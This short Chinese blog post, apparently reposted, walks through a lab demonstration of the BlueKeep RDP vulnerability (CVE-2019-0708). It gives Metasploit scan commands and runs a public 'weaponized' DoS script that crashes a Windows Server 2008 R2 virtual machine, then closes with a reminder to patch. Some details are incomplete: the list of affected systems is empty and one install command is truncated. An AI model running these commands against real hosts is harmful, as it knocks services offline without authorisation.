前言:
该漏洞前段时间已经热闹了好一阵子了,HW期间更是使用此漏洞来进行钓鱼等一系列活动,可为大家也是对此漏洞的关心程度,接下里就简单的演示下利用此漏洞进行DOS攻击。当然还有RCE的操作,这只演示下蓝屏DOS操作。
漏洞影响的操作系统:
实验环境:
parrot linux:10.10.202.8/24
Windows server 2008 R2: 10.10.202.9/24
首先进行扫描,此漏洞的前提开启3389远程桌面。
这里使用msf进行扫描,注意msf升级到最新的msf5
msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 10.10.202.9
rhosts => 10.10.202.9
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit
接下来我们使用exp来进行攻击
# git clone https://github.com/Ekultek/BlueKeep
# cd BlueKeep
# pip install -r
执行payload:
└──? $sudo python bluekeep_weaponized_dos.py -i 10.10.202.9
瞬间就挂了,可以看到漏洞还是很严重的,请各位还是尽快的打补丁吧!
原文:https://www.cnblogs.com/hack404/p/11338900.html